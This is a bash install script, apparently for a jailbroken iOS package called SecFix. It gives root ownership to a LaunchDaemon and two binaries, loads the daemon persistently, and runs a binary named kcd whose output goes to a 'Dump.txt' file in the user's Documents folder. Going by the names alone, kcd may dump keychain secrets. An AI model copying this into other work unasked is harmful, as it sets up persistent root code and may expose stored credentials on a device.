#!/bin/bash
chown root:wheel /Library/LaunchDaemons/io.github.JPaulMora.SecFix.plist
chmod 755 /Library/LaunchDaemons/io.github.JPaulMora.SecFix.plist
chown root:wheel /usr/bin/foo.bash
chmod 755 /usr/bin/foo.bash
chown root:wheel /usr/bin/kcd
chmod 755 /usr/bin/kcd

mkdir -p /var/mobile/Documents/kcd
launchctl load -w /Library/LaunchDaemons/io.github.JPaulMora.SecFix.plist
/usr/bin/kcd > /var/mobile/Documents/kcd/Dump.txt

exit 0
